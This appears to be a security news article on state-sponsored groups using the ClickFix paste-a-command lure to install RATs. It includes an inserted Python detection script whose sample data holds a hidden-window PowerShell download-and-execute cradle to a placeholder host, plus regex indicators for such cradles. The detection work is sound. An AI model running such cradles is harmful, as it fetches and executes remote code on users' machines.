State-sponsored hacking groups from Iran, North Korea, and Russia have been increasingly utilizing the ClickFix tactic in targeted malware campaigns since late 2024, according to research from Proofpoint. This tactic, previously associated with cybercrime, has now been adopted by nation-state actors to aid in the deployment of malware. Several prominent groups, including Kimsuky (TA427), MuddyWater (TA450), and APT28 (TA422), have been identified using this technique to infiltrate victim systems, bypassing traditional security measures by deceiving users into running malicious commands disguised as system fixes.
The ClickFix technique involves convincing users to copy and paste malicious PowerShell commands into their systems, often presented as solutions to technical issues. For instance, Kimsuky utilized this method in January and February 2025 to target individuals within the think tank sector. The attackers initiated contact with victims and eventually directed them to a malicious website, where they were instructed to execute the harmful PowerShell command. This led to the installation of the Quasar RAT, giving the attackers remote access to the compromised machines.
Similarly, the Iranian group MuddyWater employed ClickFix in November 2024 to install the remote monitoring software Level by persuading targets to run a PowerShell command with administrator privileges. The software gave the attackers persistent access for espionage and data theft, with a specific focus on the Middle East, particularly the United Arab Emirates and Saudi Arabia. Additionally, the Russian group UNK_RemoteRogue used a compromised Zimbra server to distribute malicious links that initiated the ClickFix sequence.
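A defender-side illustration of the common thread in these cases, added here and not taken from the Proofpoint research or this article: the script below triages constructed process-creation records for PowerShell launched directly by explorer.exe, the parent a user produces when pasting a command into the Run dialog, and reports which "pasted one-liner" traits the command line carries. The record fields, indicator set and sample values are assumptions chosen for the example.

```python
import re

# Constructed sample records shaped like Windows process-creation telemetry
# (parent image, child image, command line); not events from any real incident.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -nop -ep bypass -c "iwr http://placeholder.invalid/fix.ps1 | iex"'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Program Files\PowerShell\7\pwsh.exe",
     "cmdline": "pwsh -EncodedCommand QQBCAEMA"},  # constructed, meaningless payload
    {"parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell -File C:\ops\nightly-backup.ps1"},  # benign scheduled task
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe readme.txt"},  # not PowerShell at all
]

# Traits typical of a command a victim is told to paste: fetch-and-run from a
# remote host, encoded payload, hidden window, disabled script policy.
INDICATORS = {
    "download_cradle": re.compile(r"\b(iwr|irm|Invoke-WebRequest|Invoke-RestMethod|DownloadString|Net\.WebClient|curl)\b", re.I),
    "in_memory_exec": re.compile(r"\b(iex|Invoke-Expression)\b", re.I),
    "encoded_command": re.compile(r"(?<![\w-])-(e|ec|enc|encodedcommand)\b", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden\b", re.I),
    "policy_bypass": re.compile(r"-e(xecutionpolicy|p)?\s+bypass\b", re.I),
}
POWERSHELL = re.compile(r"\\(powershell|pwsh)\.exe$", re.I)
SHELL_PARENT = re.compile(r"\\explorer\.exe$", re.I)


def triage(event):
    """Return indicator names matched by one event (empty list if out of scope).

    Only PowerShell whose parent is explorer.exe is considered: that is the
    lineage of a command pasted into the Run dialog or Explorer address bar,
    whereas service- or scheduler-launched PowerShell has a different parent.
    """
    if not POWERSHELL.search(event["image"]) or not SHELL_PARENT.search(event["parent"]):
        return []
    return [name for name, rx in INDICATORS.items() if rx.search(event["cmdline"])]


def find_suspicious(events, min_indicators=1):
    """Return (event, indicators) pairs whose indicator count meets the threshold."""
    return [(ev, found) for ev in events if len(found := triage(ev)) >= min_indicators]


if __name__ == "__main__":
    for ev, found in find_suspicious(SAMPLE_EVENTS):
        print(f"SUSPECT parent={ev['parent']} indicators={found}\n        cmdline={ev['cmdline']}")
```

Raising `min_indicators` trades recall for precision; the explorer.exe parent check is what separates a pasted command from routine automation, so keep it even when tuning the regexes.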
Proofpoint's research notes that the appearance of ClickFix across several unrelated state-sponsored groups shows its growing appeal to nation-state actors. The persistence of the method suggests that these groups are likely to use it extensively in the future, and that other actors may adopt it as well.
In conclusion, the evolving threat landscape continues to pose significant challenges for defenders. The adoption of cybercrime techniques by nation-state actors underscores the need for continuous vigilance and robust defenses against such activity. Organizations and individuals should stay informed about emerging threats and take proactive measures to protect their systems and data from sophisticated attacks.
